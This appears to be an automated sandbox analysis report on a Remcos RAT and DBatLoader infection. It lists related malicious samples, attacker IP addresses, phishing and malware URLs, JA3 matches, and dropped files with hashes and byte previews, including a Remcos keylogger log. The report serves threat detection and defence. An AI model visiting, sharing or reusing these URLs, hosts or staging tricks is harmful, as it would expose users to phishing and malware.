                                                                                            DHL_ES567436735845755676678877988975877.vbsGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            SHEOrder-10524.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                            • 178.237.33.50
                                                                                            lmg1_Mlakaifa443456.vbsGet hashmaliciousAsyncRAT, DcRat, RemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            UrgenteNotificationRef.cmdGet hashmaliciousRemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            107. PN-EN-1090-2+A1_2012P.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            URGENTE_NOTIFICATION.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                            • 178.237.33.50
                                                                                            OKhCyJ619J.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                            • 178.237.33.50
                                                                                            fu56fbrtn8.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                            • 178.237.33.50
                                                                                            www.pentegrasystem.comONISZCZUK ASSOCIATES Purchase Order.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                            • 83.137.157.61

                                                                                            ASNs

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            INVITECHHUtajma.arm7-20240422-0539.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                            • 62.77.235.171
                                                                                            iZYqP2K1UC.elfGet hashmaliciousMiraiBrowse
                                                                                            • 91.83.150.40
                                                                                            BNuwexy0tz.elfGet hashmaliciousMiraiBrowse
                                                                                            • 213.197.122.124
                                                                                            llADOrptJY.elfGet hashmaliciousMiraiBrowse
                                                                                            • 81.0.116.113
                                                                                            ONISZCZUK ASSOCIATES Purchase Order.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                            • 83.137.157.61
                                                                                            BxBT7a2sCE.exeGet hashmaliciousGuLoaderBrowse
                                                                                            • 83.137.157.60
                                                                                            f1vPbtLjJn.exeGet hashmaliciousGuLoaderBrowse
                                                                                            • 83.137.157.60
                                                                                            AMP4qOxnnc.elfGet hashmaliciousMiraiBrowse
                                                                                            • 89.148.108.253
                                                                                            DHL TAX INVOICES - MARCH 2024.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                            • 83.137.157.76
                                                                                            huhu.mips.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                            • 91.83.150.76
                                                                                            ATOM86-ASATOM86NLPURCHASEORDERSHEET&SPECIFICATIONSDOC.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            DHL_ES567436735845755676678877988975877.vbsGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            SHEOrder-10524.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                            • 178.237.33.50
                                                                                            lmg1_Mlakaifa443456.vbsGet hashmaliciousAsyncRAT, DcRat, RemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            UrgenteNotificationRef.cmdGet hashmaliciousRemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            107. PN-EN-1090-2+A1_2012P.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            URGENTE_NOTIFICATION.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                            • 178.237.33.50
                                                                                            OKhCyJ619J.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                            • 178.237.33.50
                                                                                            fu56fbrtn8.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                            • 178.237.33.50

                                                                                            JA3 Fingerprints

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            28a2c9bd18a11de089ef85a160da29e4https://messageis.ru/pre/profile/messageGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 23.204.76.112
                                                                                            • 40.127.169.103
                                                                                            MSG.docxGet hashmaliciousUnknownBrowse
                                                                                            • 23.204.76.112
                                                                                            • 40.127.169.103
                                                                                            http://trailersalesandparts.caGet hashmaliciousUnknownBrowse
                                                                                            • 23.204.76.112
                                                                                            • 40.127.169.103
                                                                                            https://open.camscanner.com/doc/download_file?platform=web&type=118&sid=8c5645d2944c4b262e3b5813d266f0d5&title=ProjectUpdate-XGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 23.204.76.112
                                                                                            • 40.127.169.103
                                                                                            https://doc-42.jimdosite.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                            • 23.204.76.112
                                                                                            • 40.127.169.103
                                                                                            https://live.easygenerator.com/review/course/3850bd4a-58ae-47b2-bb6f-157e213d949f/Get hashmaliciousUnknownBrowse
                                                                                            • 23.204.76.112
                                                                                            • 40.127.169.103
                                                                                            https://webcompanion.com/nano_download.php?Get hashmaliciousUnknownBrowse
                                                                                            • 23.204.76.112
                                                                                            • 40.127.169.103
                                                                                            Scanned from Xerox Multi.......rtfGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 23.204.76.112
                                                                                            • 40.127.169.103
                                                                                            INETCwsSDezirces.dllGet hashmaliciousUnknownBrowse
                                                                                            • 23.204.76.112
                                                                                            • 40.127.169.103
                                                                                            https://xxxjns2qi.z13.web.core.windows.net/Get hashmaliciousTechSupportScamBrowse
                                                                                            • 23.204.76.112
                                                                                            • 40.127.169.103
                                                                                            6271f898ce5be7dd52b0fc260d0662b3https://open.camscanner.com/doc/download_file?platform=web&type=118&sid=8c5645d2944c4b262e3b5813d266f0d5&title=ProjectUpdate-XGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 23.35.153.42
                                                                                            323nndksdhndsf783.docxGet hashmaliciousUnknownBrowse
                                                                                            • 23.35.153.42
                                                                                            SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.32374.20351.xlsxGet hashmaliciousUnknownBrowse
                                                                                            • 23.35.153.42
                                                                                            https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==Get hashmaliciousHTMLPhisherBrowse
                                                                                            • 23.35.153.42
                                                                                            http://wsj.pmGet hashmaliciousNetSupport RATBrowse
                                                                                            • 23.35.153.42
                                                                                            https://itniy4gbb.cc.rs6.net/tn.jsp?f=001DpCT81a7BIE926OduG6KmKkwKebSAbUZq28C52DoY-FfQJyM_2Gq3l18V1j7KWwJQTfGlQ_HSq0vC8xqJqFST9z0CwmpWgUieBjKckdJcSODJ_3vu5MzvaSoOGbGY9SjpWQtg9-aAXm1e6VV91z84Q2_wlyDMR98&c=i37ZFF5Dy2QSFqOfb2TVpr5vkMFqaR6DdoQbIhzcRV7G2oFwX8NEvA==&ch=2ErEiCYnoykaXa1uoD0AgTD1vOpSqc6zh3ef32Gb4XR_ut8_qvmzHA==&c=&ch=&__=/mrlZp0zmTKgGvsPpx0JUyCMjGZr4J6/Z2dvbnphbGV6c2FsYXNAc2FuaXRhcy5lcw==Get hashmaliciousHTMLPhisherBrowse
                                                                                            • 23.35.153.42
                                                                                            http://learningstudio.aiGet hashmaliciousUnknownBrowse
                                                                                            • 23.35.153.42
                                                                                            FW_ FHAS Inc_ - Private and Confidential.msgGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                            • 23.35.153.42
                                                                                            https://stake.libertariancounterpoint.com/+6N67YCBGYSfgUDfzZBWz4mBQM+X0RyGi80NjJ/FF4eJwViQGet hashmaliciousUnknownBrowse
                                                                                            • 23.35.153.42
                                                                                            https://funcallback.comGet hashmaliciousUnknownBrowse
                                                                                            • 23.35.153.42
                                                                                            a0e9f5d64349fb13191bc781f81f42e1https://control.mailblaze.com/index.php/survey/wq790f4mf09e0Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                            • 142.250.217.193
                                                                                            neo.msiGet hashmaliciousLatrodectusBrowse
                                                                                            • 142.250.217.193
                                                                                            z55NF-Faturada-23042024.msiGet hashmaliciousMicroClipBrowse
                                                                                            • 142.250.217.193
                                                                                            ePI4igo4y1.exeGet hashmaliciousAsyncRATBrowse
                                                                                            • 142.250.217.193
                                                                                            file.exeGet hashmaliciousRisePro StealerBrowse
                                                                                            • 142.250.217.193
                                                                                            file.exeGet hashmaliciousRisePro StealerBrowse
                                                                                            • 142.250.217.193
                                                                                            http://cleverchoice.com.auGet hashmaliciousUnknownBrowse
                                                                                            • 142.250.217.193
                                                                                            https://therufus.org/download.phpGet hashmaliciousUnknownBrowse
                                                                                            • 142.250.217.193
                                                                                            j1zkOQTx4q.exeGet hashmaliciousRisePro StealerBrowse
                                                                                            • 142.250.217.193
                                                                                            VoGtelkHSn.exeGet hashmaliciousLummaCBrowse
                                                                                            • 142.250.217.193

                                                                                            Dropped Files

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            C:\Users\Public\alpha.exeEnquiry 230424.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                              URGENTE_NOTIFICATION.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                ORDER-CONFIRMATION-DETAILS-000235374564.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                  RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                    aaa.batGet hashmaliciousUnknownBrowse
                                                                                                      20240416-703661.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                                        20240416-703661.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                          NEW ORDER 04154SHOP N0AWE12893.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                            FT-3-TL-BALANCE,jpg.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                                              ONISZCZUK ASSOCIATES Purchase Order.batGet hashmaliciousRemcos, DBatLoaderBrowse

                                                                                                                Created / dropped Files

                                                                                                                C:\ProgramData\remcos\logs.dat

                                                                                                                Download File
                                                                                                                Process:C:\Users\Public\Libraries\sppsvc.pif
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):288
                                                                                                                Entropy (8bit):3.3235171649784028
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:6l+YfCb5YcIeeDAlOWAAe5q1gWAAe5q1gWAv:6lEDec0WFe5BWFe5BW+
                                                                                                                MD5:4C95E05ABC5B9270219FB447865EEC73
                                                                                                                SHA1:B0C4DAE10BB06B81D6F45A9B34D1B5347525E1D8
                                                                                                                SHA-256:D87FC69F8A2DFEA93FFC9CD8BB0ADE9747570228A7A5877C81FC73CFC4DE9E49
                                                                                                                SHA-512:A32240F720250C41F25A1F15721FC8220FCD2AABFCCD6B98C624CB32C79E427F7CFB3421B0E973F382BD4E3414B8A8AAA45841426C4B023A098FA09C97F9908C
                                                                                                                Malicious:true
                                                                                                                Yara Hits:
                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                                                Preview:....[.2.0.2.4./.0.4./.2.6. .2.1.:.5.6.:.2.3. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                                                                                C:\Users\Public\Kpeyvroh.url

                                                                                                                Download File
                                                                                                                Process:C:\Users\Public\Libraries\sppsvc.pif
                                                                                                                File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Kpeyvroh.PIF">), ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):99
                                                                                                                Entropy (8bit):4.999214418208358
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMiaoysb8RycuAEvn:HRYFVmTWDyzPIE9cPEvn
                                                                                                                MD5:C27D364B576ED0C0CEF5199F93E02752
                                                                                                                SHA1:2EA1DB7B11725F7D7D26BAF3878FDE8EC86B6F37
                                                                                                                SHA-256:30BADDAFDCB7A76B3C6A3420A3B5C8F69779D25F0C8B425994F1CF588368B43C
                                                                                                                SHA-512:9D02EB8093515CC6097EF40D8370F1DE3F95BCF3248986A2225E166370B97A98BD828330B0EDFA5C95A6C4EA69344B57AE1A8FED801619F87FD94696AD2988D0
                                                                                                                Malicious:true
                                                                                                                Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Kpeyvroh.PIF"..IconIndex=44..HotKey=8..

                                                                                                                C:\Users\Public\Libraries\Kpeyvroh

                                                                                                                Download File
                                                                                                                Process:C:\Users\Public\Libraries\sppsvc.pif
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):838752
                                                                                                                Entropy (8bit):7.137921219135916
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12288:Ry84sq+V+KFCxKsTit+UoLhZYimbsvWRtfi+EhMfHU0MlXk5:R/26+fxKjQLMFbFTEIHxMlXS
                                                                                                                MD5:C4F76AC0DA004DB0BC2CAA009C7CCDF8
                                                                                                                SHA1:A92ECFA375D947954D50F79D757A04B50F24619C
                                                                                                                SHA-256:B36E7823A1C84CB6F325038CEDD3AA46C46B93A6A85294BB121A2FF94483DDA4
                                                                                                                SHA-512:944C401BAF3BD41929BF939C54BCE964823A5A009CB49B9A4C46C30AB48E8EEF0DDA6FB18271EF7E60672E63E1D323761AD3D234FA3244EB1EC1763430E07C12
                                                                                                                Malicious:true
                                                                                                                Preview:KIJFaV..BaDh"".aDEF!GKIJ""DaEDVXEDBa+0,'',*45(3:;/3:;246/2'2+;-4&++(KIJFaV..BaDh"".aDEF!GKIJ""DaEDVXEDBal3(<952+27/KIJFaV..BaDh"".aDEF!GKIJ""DaEDVXEDBa...........|.R.j<0..|:...F.)b.N.........$..=.>..&[b'sYo.V.@.U.P[..Zc.S.,Ykoo.....9.0.Z0~..4.3.S$:..fO~~..^K.>.zNj.mX).~$.P...[..Y..X}[}....F/.=!.oO(j.CTk.E.5d.^'.G\lq..IL..n. .3Dl..6.`4..c....Y..>U i....R..^S.p..'1-...9k.=...R..SZ.5c.^.ml...D...Fa.GT.\.W.,.B..l.[F..I.bO.>.Tn.VR..NV...Uk.!]..IN..c.aF.).\7.KV.NM*3..$....H...5Noa.ed...O0}.0.#yH.UP.3..R.}vU...z.Zc.L~M...y....M$.(..`.Ap..VN.+.O...*T.'sZ.T..`..qV.!.+)...~._..OL..CM.>.T.....2...:..2.A.Go..K...+t.R..Q2.q.^n.V...Q.,..=i..|...j;16...?.`.X.J.z3y.N..d.g.....J...o.y`f.KV.5..^$.q._0...;.Y<.e....;p.$.y.&HK'..^.KQB.!p.]..Noa...^S......+<+.j.S.8.T.O[..Q.2.\.K..E.X!6.`k.g....q._.DO....../gw....SF;.P.Mj.".......l..*Kb...hSh.0..0.#..W}.".#.,.A.G.Y.#.\..2S.Oo.>S.b..GV.....()..?.......w......I.!@.U|...#"g6bXG>.cQ...QS..!...`.n"...I.. .An.....BTZ|.%...Zc.^...\..@..4....D...[.b

                                                                                                                C:\Users\Public\Libraries\Kpeyvroh.PIF

                                                                                                                Download File
                                                                                                                Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1465344
                                                                                                                Entropy (8bit):7.547181293460755
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:jrVwDIOjBTiCcv9WeAvHUFQkHNJxrx0uHctgGqM0Fvj4irjlUIxB:j3dzA/CQk/d9ct0MEvjnj
                                                                                                                MD5:F83153803040CB7382CF1CC8ABEBD4C7
                                                                                                                SHA1:6E87B535356C247834D0112F8846AC6F64D15247
                                                                                                                SHA-256:35D947955E37F039632EA8DA3A00296FA9C8D6C1ABE4B62C50D93B976B76C3FB
                                                                                                                SHA-512:75306AE1E4139E9CDD6CC5AAE7CD936E0379F2955D7246D5C05EFE1672B45D9A88B61BF143F0C57822711444D706102E14569A897EC2A2B53DADD841C82399BA
                                                                                                                Malicious:true
                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@..............................<&.......P...................0..d`........................... .......................................................text...,U.......V.................. ..`.itext..H,...p.......Z.............. ..`.data...............................@....bss.... 6...............................idata..<&.......(..................@....tls....4................................rdata....... ......................@..@.reloc..d`...0...b..................@..B.rsrc....P.......P..................@..@.....................\..............@..@................................................................................................

                                                                                                                C:\Users\Public\Libraries\sppsvc.pif

                                                                                                                Download File
                                                                                                                Process:C:\Users\Public\kn.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1465344
                                                                                                                Entropy (8bit):7.547181293460755
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:jrVwDIOjBTiCcv9WeAvHUFQkHNJxrx0uHctgGqM0Fvj4irjlUIxB:j3dzA/CQk/d9ct0MEvjnj
                                                                                                                MD5:F83153803040CB7382CF1CC8ABEBD4C7
                                                                                                                SHA1:6E87B535356C247834D0112F8846AC6F64D15247
                                                                                                                SHA-256:35D947955E37F039632EA8DA3A00296FA9C8D6C1ABE4B62C50D93B976B76C3FB
                                                                                                                SHA-512:75306AE1E4139E9CDD6CC5AAE7CD936E0379F2955D7246D5C05EFE1672B45D9A88B61BF143F0C57822711444D706102E14569A897EC2A2B53DADD841C82399BA
                                                                                                                Malicious:true
                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@..............................<&.......P...................0..d`........................... .......................................................text...,U.......V.................. ..`.itext..H,...p.......Z.............. ..`.data...............................@....bss.... 6...............................idata..<&.......(..................@....tls....4................................rdata....... ......................@..@.reloc..d`...0...b..................@..B.rsrc....P.......P..................@..@.....................\..............@..@................................................................................................

                                                                                                                C:\Users\Public\alpha.exe

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\extrac32.exe
                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                Category:modified
                                                                                                                Size (bytes):289792
                                                                                                                Entropy (8bit):6.135598950357573
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6144:k4WA1B9BxDfQWKORSqY4zOcmpdlc3gJdmtolSm:H1BhkWvSqY4zvmjOwJIT
                                                                                                                MD5:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                SHA1:F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D
                                                                                                                SHA-256:B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450
                                                                                                                SHA-512:99E784141193275D4364BA1B8762B07CC150CA3CB7E9AA1D4386BA1FA87E073D0500E61572F8D1B071F2FAA2A51BB123E12D9D07054B59A1A2FD768AD9F24397
                                                                                                                Malicious:false
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Joe Sandbox View:
                                                                                                                • Filename: Enquiry 230424.bat, Detection: malicious, Browse
                                                                                                                • Filename: URGENTE_NOTIFICATION.cmd, Detection: malicious, Browse
                                                                                                                • Filename: ORDER-CONFIRMATION-DETAILS-000235374564.cmd, Detection: malicious, Browse
                                                                                                                • Filename: RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZ, Detection: malicious, Browse
                                                                                                                • Filename: aaa.bat, Detection: malicious, Browse
                                                                                                                • Filename: 20240416-703661.cmd, Detection: malicious, Browse
                                                                                                                • Filename: 20240416-703661.cmd, Detection: malicious, Browse
                                                                                                                • Filename: NEW ORDER 04154SHOP N0AWE12893.bat, Detection: malicious, Browse
                                                                                                                • Filename: FT-3-TL-BALANCE,jpg.cmd, Detection: malicious, Browse
                                                                                                                • Filename: ONISZCZUK ASSOCIATES Purchase Order.bat, Detection: malicious, Browse
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........OH...&...&...&..V...&..E%...&..E"...&...'../&..E'...&..E#...&..E+...&..E....&..E$...&.Rich..&.................PE..d...S.............".................P..........@.............................p............`.................................................(...................4#...........`......`Z..T............................,...............4...... ........................text............................... ..`.rdata..<.... ......................@..@.data...P...........................@....pdata..4#.......$..................@..@.didat..............................@....rsrc...............................@..@.reloc.......`.......h..............@..B........................................................................................................................................................................................................................

                                                                                                                C:\Users\Public\ger.exe

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\extrac32.exe
                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                Category:modified
                                                                                                                Size (bytes):77312
                                                                                                                Entropy (8bit):5.996265028984654
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:/ZsKjopjN/cYXsuMdCAOznsA5q+oxxhRO+sAg9RyTVZiJXpnvo/vrK:FW5nspdCbzpq+iLcqjWXpvo/vm
                                                                                                                MD5:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                SHA1:C0DB341DEFA8EF40C03ED769A9001D600E0F4DAE
                                                                                                                SHA-256:C0E25B1F9B22DE445298C1E96DDFCEAD265CA030FA6626F61A4A4786CC4A3B7D
                                                                                                                SHA-512:101907B994D828C83587C483B4984F36CAF728B766CB7A417B549852A6207E2A3FE9EDC8EFF5EEAB13E32C4CF1417A3ADCCC089023114EA81974C5E6B355FED9
                                                                                                                Malicious:false
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........................................................r.........Rich............PE..d....6<..........."..........N.................@.............................p......@.....`.......... ..........................................D....P.......@..,............`..D.......T...........................0...............H...x............................text...p........................... ..`.rdata..(........0..................@..@.data...(....0......................@....pdata..,....@......................@..@.rsrc........P.......$..............@..@.reloc..D....`.......,..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                C:\Users\Public\kn.exe

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\extrac32.exe
                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                Category:modified
                                                                                                                Size (bytes):1651712
                                                                                                                Entropy (8bit):6.144018815244304
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:MeiElH5YZ5cv6r3HiaZQ8p4XGwiJDgN7MaikGLIsWWi4pT/Y/7hsyDAP760MKR:Me3lZYUvmSu4XTckYD0sWWiwT/MhTzK
                                                                                                                MD5:F17616EC0522FC5633151F7CAA278CAA
                                                                                                                SHA1:79890525360928A674D6AEF11F4EDE31143EEC0D
                                                                                                                SHA-256:D252235AA420B91C38BFEEC4F1C3F3434BC853D04635453648B26B2947352889
                                                                                                                SHA-512:3ED65172159CD1BCC96B5A0B41D3332DE33A631A167CE8EE8FC43F519BB3E2383A58737A41D25AA694513A68C639F0563A395CD18063975136DE1988094E9EF7
                                                                                                                Malicious:false
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u}{h1..;1..;1..;..;0..;%w.:2..;%w.:*..;%w.:!..;%w.:...;1..;...;%w.:...;%w.;0..;%w.:0..;Rich1..;................PE..d...+. H.........."..................L.........@....................................q.....`.......... ......................................@Q.......`..@........x..............l'..p5..T...........................`(..............x)......XC.......................text............................... ..`.rdata..T...........................@..@.data....&..........................@....pdata...x.......z...|..............@..@.didat.......P......................@....rsrc...@....`......................@..@.reloc..l'.......(..................@..B........................................................................................................................................................................................................................

                                                                                                                C:\Users\Public\sppsvc.rtf

                                                                                                                Download File
                                                                                                                Process:C:\Users\Public\kn.exe
                                                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2930690
                                                                                                                Entropy (8bit):3.9393185097303203
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:/ffRlz0OgSXiZbDPlJJVr1SU8o2nxcaNgjUgoOLzF6u/NWedS6e9ucdix2Q8WbW9:H
                                                                                                                MD5:0CC78C776371256C0E6488752CEDB5ED
                                                                                                                SHA1:777A959592A22F66805B0C1B99F518658D75D76E
                                                                                                                SHA-256:5158C0E055999575BD178961F57409C6C6010658B5493C0577F84143666D5668
                                                                                                                SHA-512:85FE8796A3F9B286A150986F2D9462C54982C297A9529FD1A58F02FCF355A70F2058D443848A710AE2DB5907AF05718E64EE9D165503F79A1BCB11033F9BE452
                                                                                                                Malicious:false
                                                                                                                Preview:4d5a50000200000004000f00ffff0000b80000000000000040001a00000000000000000000000000000000000000000000000000000000000000000000010000ba10000e1fb409cd21b8014ccd219090546869732070726f6772616d206d7573742062652072756e20756e6465722057696e33320d0a243700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000504500004c010900195e422a0000000000000000e0008e810b0102190084050000d4100000000000009c05000010000000a005000000400000100000000200000400000000000000040000000000000000f01600000400000000000002000000000010000040000000001000001000000000000010000000000000000000000000e015003c26000000a016000050000000000000000000000000000000000000003016006460000000000000000000000000000000000000000000000000000000201600180000000000000000000000000000000000000008e71500f00500000000000000000000000000000000000000000000

                                                                                                                C:\Users\Public\xkn.exe

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\extrac32.exe
                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                Category:modified
                                                                                                                Size (bytes):452608
                                                                                                                Entropy (8bit):5.459268466661775
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6144:r2fdXxswSX0z/YWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:qVXqXEgW2KXzJ4pdd3klnnWosPhnzq
                                                                                                                MD5:04029E121A0CFA5991749937DD22A1D9
                                                                                                                SHA1:F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054
                                                                                                                SHA-256:9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F
                                                                                                                SHA-512:6A2FB055473033FD8FDB8868823442875B5B60C115031AAEDA688A35A092F6278E8687E2AE2B8DC097F8F3F35D23959757BF0C408274A2EF5F40DDFA4B5C851B
                                                                                                                Malicious:false
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./..%k.ovk.ovk.ovu..vi.ovb..va.ov..lwi.ov..kwq.ovk.nv.ov..nwn.ov..jwb.ov..bwb.ov..vj.ov..mwj.ovRichk.ov........................PE..d....A.~.........."..........^......@=.........@..........................................`.......... .......................................L...........}...p..........................T......................(..................`................................text............................... ..`.rdata.............................@..@.data...,....`.......L..............@....pdata.......p.......T..............@..@.rsrc....}.......~...^..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................

                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\xkn.exe.log

                                                                                                                Download File
                                                                                                                Process:C:\Users\Public\xkn.exe
                                                                                                                File Type:CSV text
                                                                                                                Category:dropped
                                                                                                                Size (bytes):3175
                                                                                                                Entropy (8bit):5.353293623550607
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:iqbYqGSI6o9xYsntpDxqKkWqmtzHfq1NYrKaq7BjwOIzQ0L:iqbYqGcQtpDxqKkWqmtzHfq1uLqBTIzt
                                                                                                                MD5:C4A02ED3EC7A44A9CD49B57022C29D97
                                                                                                                SHA1:B51BC5956BCCBAFD205D3776890D79800F6CFDF6
                                                                                                                SHA-256:F2F02FDD5177A7C78770E107A16D713E91C070114743FE97A8198E92D758E10D
                                                                                                                SHA-512:352FDC733C6D495C66CF409A55D325FD1C5032E0445F700F0AF4CFA20BB5FA5DA56E241F2AEA567BFD610E272F2A4D84270F362E9503BB968E3D2C8C389C7812
                                                                                                                Malicious:false
